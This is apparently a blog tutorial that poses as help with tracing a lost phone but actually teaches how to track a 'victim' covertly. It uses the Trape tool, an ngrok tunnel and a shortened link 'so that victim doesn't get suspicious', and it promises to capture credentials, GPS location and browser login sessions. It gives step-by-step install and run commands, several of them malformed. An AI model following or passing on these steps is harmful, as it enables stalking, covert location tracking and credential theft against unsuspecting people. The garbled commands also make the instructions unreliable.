How to trace a cellphone without IP? ANONYMOUS TIM3
Hello, geek whatsup? Many of us don’t know How to trace a cellphone without IP? If you are searching about How to trace a cellphone without IP, then this article is for you.
It is often seen that our phone is lost or stolen. In that case, we have nothing to do. If we lose our phone and complain to the police, the phone may be found, but it takes a long time, and often we do not find our phone.
We often search the internet to find out how to find a lost phone or how to find the location of the phone. But most of the time we get the wrong information. So, today I will share with you how we can trace our phone without knowing the IP on the phone. are you excited? Let's go for it.
HOW WE CAN DO?
In this post, we are gonna TRACK any cellphone easily using a simple tool called 'Trape' and little social engineering tricks. Using Trape we can get a tracking URL for the victim. If the victim enters the URL. We will get the IP logs in the Trape control panel.
ONCE THE VICTIM IS TRAPPED :
• We can capture credentials, important details, etc.
• We can get the real-time location if the GPS is turned on.
• We can cheek the login session of the browsers that the victim used.
LET'S KNOW HOW TO INSTALL & USE THE 'TRAPE' TOOL :
First, Open up your terminal and type the following command or you can copy and paste it
cd Desktop/git clone https://github.com/jofpin/trape.git
Now, go to the downloaded folder by using this command.
cd Desktop
ls
cd Trape/
ls
Now we have to install the necessary packages. So, do it by the following command.
pip install -r requirements.txt
Now type this command to see how to use this tool.
python trape.py -h
Here we are using the URL https://google.com/ and the PORT 8080 as an example. So, our command will be
python trape.py -u https://google.com -p 8080
Here we got two links and one access key. The first link is to trape the victim. The second link is the trape control panel link and the access key is for access to the control panel.
Tips: shorten the above URL by any link shorter, so that victim doesn't get suspicious.
NOTE : The IP Address 127.0.0.1 which used in the generated link is a local IP address. It will work only the devices connected to the same local network.
But don’t worry. NGROK tool can help us in this situation.
So, Download and extract NGROK on the desktop and copy the NGROK executable file to the desktop. Now open up the terminal to change the directory.
Type :
cd Desktop
ls
we need to setup NGROK script. Type the command.
chmod +x ngrok
mv ngrok /user/bin
Now clear the terminal by typing clear command. And again run this command
ngrok http 8080
Now copy the control pannel link and paste & search in browser. You will be logged in to the control pannel dashboard. Here you can manage trapped victims. That's all for today.
I hope you enjoy this tutorial. If you regarding any problem with this topic please send me messages on my social media link.
0 Comments